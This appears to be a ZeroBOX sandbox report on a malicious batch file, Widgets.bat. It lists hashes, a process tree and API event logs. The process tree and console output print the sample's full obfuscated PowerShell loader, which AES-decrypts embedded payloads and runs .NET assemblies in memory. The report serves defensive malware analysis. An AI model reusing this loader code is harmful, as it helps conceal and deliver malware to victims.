Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 14, 2023, 5:07 p.m.	May 14, 2023, 5:09 p.m.

Size	193.8KB
Type	DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5	`b03d77953c460064e03d928ce56b1976`
SHA256	`cc3f1dc91c25d79abbb529fcf0c3114f1830b320ddb96bd0e10667b06dc46b9f`
CRC32	`EDB98B23`
ssdeep	`3072:GpcgpFFp2vSv/kRTwxq/n0yLiPPPtGlrIXycGToEn5ugDltoaGnnuH7Y/7Fgw/7:GpzpTp2q0RMcMIrIiXpDPoaGnuHsp3/7`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "CTTGQcLBTBkha" C:\Users\test22\AppData\Local\Temp\Widgets.bat
3040
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Widgets.bat
  2200
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Widgets.bat
    196
    - Widgets.bat.exe "C:\Users\test22\AppData\Local\Temp\Widgets.bat.exe" -w hidden -c $TXfY='ReaLBTjdLLBTjinLBTjesLBTj'.Replace('LBTj', '');$TIFx='TrLBTjaLBTjnsfLBTjorLBTjmFiLBTjnLBTjalBlLBTjocLBTjkLBTj'.Replace('LBTj', '');$dnCj='ChaLBTjngeELBTjxtenLBTjsioLBTjnLBTj'.Replace('LBTj', '');$geEm='EleLBTjmeLBTjntLBTjAtLBTj'.Replace('LBTj', '');$wHCj='FrLBTjomLBTjBaseLBTj64SLBTjtLBTjrLBTjiLBTjnLBTjgLBTj'.Replace('LBTj', '');$AqWy='InLBTjvoLBTjkLBTjeLBTj'.Replace('LBTj', '');$CrqW='CrLBTjeatLBTjeDecLBTjryLBTjptoLBTjrLBTj'.Replace('LBTj', '');$khtm='GeLBTjtCLBTjuLBTjrrLBTjentPLBTjrocLBTjessLBTj'.Replace('LBTj', '');$KwrX='EnLBTjtryLBTjPoLBTjiLBTjntLBTj'.Replace('LBTj', '');$fieb='LLBTjoaLBTjdLBTj'.Replace('LBTj', '');$HiPp='SLBTjplLBTjitLBTj'.Replace('LBTj', '');$vlrA='MLBTjaiLBTjnModLBTjulLBTjeLBTj'.Replace('LBTj', '');function fRRPh($DnQua){$CjZvd=[System.Security.Cryptography.Aes]::Create();$CjZvd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CjZvd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CjZvd.Key=[System.Convert]::$wHCj('1miXrhhJhMlPNZf234BClG8WEdSEXKgCHPhV8YIU61Y=');$CjZvd.IV=[System.Convert]::$wHCj('KhKlhfyzOoIJAJ+933W5sA==');$baAva=$CjZvd.$CrqW();$hPGap=$baAva.$TIFx($DnQua,0,$DnQua.Length);$baAva.Dispose();$CjZvd.Dispose();$hPGap;}function uDQIQ($DnQua){$FXPtQ=New-Object System.IO.MemoryStream(,$DnQua);$rDgyg=New-Object System.IO.MemoryStream;$oYczS=New-Object System.IO.Compression.GZipStream($FXPtQ,[IO.Compression.CompressionMode]::Decompress);$oYczS.CopyTo($rDgyg);$oYczS.Dispose();$FXPtQ.Dispose();$rDgyg.Dispose();$rDgyg.ToArray();}$ZZlcK=[System.Linq.Enumerable]::$geEm([System.IO.File]::$TXfY([System.IO.Path]::$dnCj([System.Diagnostics.Process]::$khtm().$vlrA.FileName, $null)), 1);$ypoNV=$ZZlcK.Substring(2).$HiPp(':');$hFCAj=uDQIQ (fRRPh ([Convert]::$wHCj($ypoNV[0])));$WShQc=uDQIQ (fRRPh ([Convert]::$wHCj($ypoNV[1])));[System.Reflection.Assembly]::$fieb([byte[]]$WShQc).$KwrX.$AqWy($null,$null);[System.Reflection.Assembly]::$fieb([byte[]]$hFCAj).$KwrX.$AqWy($null,$null);
      2408

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA May 14, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW May 14, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 14, 2023, 5:07 p.m.			0	0

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: At line:1 char:974 console_handle: 0x0000002f	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: + $TXfY='ReaLBTjdLLBTjinLBTjesLBTj'.Replace('LBTj', '');$TIFx='TrLBTjaLBTjnsfLB console_handle: 0x0000003b	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: TjorLBTjmFiLBTjnLBTjalBlLBTjocLBTjkLBTj'.Replace('LBTj', '');$dnCj='ChaLBTjngeE console_handle: 0x00000047	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: LBTjxtenLBTjsioLBTjnLBTj'.Replace('LBTj', '');$geEm='EleLBTjmeLBTjntLBTjAtLBTj' console_handle: 0x00000053	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: .Replace('LBTj', '');$wHCj='FrLBTjomLBTjBaseLBTj64SLBTjtLBTjrLBTjiLBTjnLBTjgLBT console_handle: 0x0000005f	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: j'.Replace('LBTj', '');$AqWy='InLBTjvoLBTjkLBTjeLBTj'.Replace('LBTj', '');$CrqW console_handle: 0x0000006b	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: ='CrLBTjeatLBTjeDecLBTjryLBTjptoLBTjrLBTj'.Replace('LBTj', '');$khtm='GeLBTjtCL console_handle: 0x00000077	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: BTjuLBTjrrLBTjentPLBTjrocLBTjessLBTj'.Replace('LBTj', '');$KwrX='EnLBTjtryLBTjP console_handle: 0x00000083	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: oLBTjiLBTjntLBTj'.Replace('LBTj', '');$fieb='LLBTjoaLBTjdLBTj'.Replace('LBTj', console_handle: 0x0000008f	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: '');$HiPp='SLBTjplLBTjitLBTj'.Replace('LBTj', '');$vlrA='MLBTjaiLBTjnModLBTjulL console_handle: 0x0000009b	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: BTjeLBTj'.Replace('LBTj', '');function fRRPh($DnQua){$CjZvd=[System.Security.Cr console_handle: 0x000000a7	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: yptography.Aes]::Create();$CjZvd.Mode=[System.Security.Cryptography.CipherMode] console_handle: 0x000000b3	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: ::CBC;$CjZvd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CjZvd.K console_handle: 0x000000bf	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: ey=[System.Convert]::$wHCj( <<<< '1miXrhhJhMlPNZf234BClG8WEdSEXKgCHPhV8YIU61Y=' console_handle: 0x000000cb	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: );$CjZvd.IV=[System.Convert]::$wHCj('KhKlhfyzOoIJAJ+933W5sA==');$baAva=$CjZvd.$ console_handle: 0x000000d7	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: CrqW();$hPGap=$baAva.$TIFx($DnQua,0,$DnQua.Length);$baAva.Dispose();$CjZvd.Disp console_handle: 0x000000e3	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: ose();$hPGap;}function uDQIQ($DnQua){$FXPtQ=New-Object System.IO.MemoryStream(, console_handle: 0x000000ef	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: $DnQua);$rDgyg=New-Object System.IO.MemoryStream;$oYczS=New-Object System.IO.Co console_handle: 0x000000fb	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: mpression.GZipStream($FXPtQ,[IO.Compression.CompressionMode]::Decompress);$oYcz console_handle: 0x00000107	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: S.CopyTo($rDgyg);$oYczS.Dispose();$FXPtQ.Dispose();$rDgyg.Dispose();$rDgyg.ToAr console_handle: 0x00000113	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: ray();}$ZZlcK=[System.Linq.Enumerable]::$geEm([System.IO.File]::$TXfY([System.I console_handle: 0x0000011f	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: O.Path]::$dnCj([System.Diagnostics.Process]::$khtm().$vlrA.FileName, $null)), 1 console_handle: 0x0000012b	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: );$ypoNV=$ZZlcK.Substring(2).$HiPp(':');$hFCAj=uDQIQ (fRRPh ([Convert]::$wHCj($ console_handle: 0x00000137	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: ypoNV[0])));$WShQc=uDQIQ (fRRPh ([Convert]::$wHCj($ypoNV[1])));[System.Reflecti console_handle: 0x00000143	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: on.Assembly]::$fieb([byte[]]$WShQc).$KwrX.$AqWy($null,$null);[System.Reflection console_handle: 0x0000014f	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: .Assembly]::$fieb([byte[]]$hFCAj).$KwrX.$AqWy($null,$null); console_handle: 0x0000015b	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x00000167	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: ecordException console_handle: 0x00000173	1	1
WriteConsoleW May 14, 2023, 5:07 p.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x0000017f	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad2b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad2b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad2b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad2b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad2b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad2b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ada38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ada38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ada38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006aceb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006adcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 14, 2023, 5:07 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02660000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02592000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02617000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02603000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02604000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02605000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02606000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02607000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02608000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02609000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05020000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05021000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05024000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05025000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05026000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
